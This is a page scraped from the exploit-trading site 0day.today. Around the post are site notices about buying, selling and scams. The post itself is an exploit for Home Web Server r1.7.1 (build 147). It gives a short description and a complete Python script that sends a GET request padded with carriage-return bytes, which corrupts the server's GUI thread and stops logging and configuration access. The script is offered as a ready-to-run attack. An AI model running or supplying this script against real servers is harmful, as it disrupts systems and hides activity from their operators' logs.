0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Home Web Server <= r1.7.1 (build 147) Gui Thread-Memory Corruption
================================================================== Home Web Server <= r1.7.1 (build 147) Gui Thread-Memory Corruption ================================================================== Home Web Server <=r1.7.1 (build 147) "Gui Thread-Memory Corruption Exploit." By: Aodrulez. Product Released : 22.4.2009/21:16:58 Description: This web server when fed with 1006 bytes of chr(0x0d),with the html "GET" parameter,the Server's Gui's Thread gets corrupted.This means, though the web server works normally, (due to Multithreading),No more Logs are generated.Also "all" the web server configuration settings are unavailable. Exploit (Python): ---------------------------------------------------------- # Echo client program import socket HOST = 'localhost' # The remote host pORT = 80 # The same port as used by the server print '####################################' print '#Home Web Server r1.7.1 (build 147)#' print '# Gui Thread Corruption Exploit #' print '# #' print '# By: Aodrulez #' print '# #' print '####################################' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, pORT)) p='GET '+chr(0x0d)*1001+'index.html HTTp/1.0\r\n\r\n' s.send(p) s.close() print '\"'+HOST+'\'s Gui Got Corrupted :P\" ' --------------------------------------------------------- # 0day.today [2024-12-26] #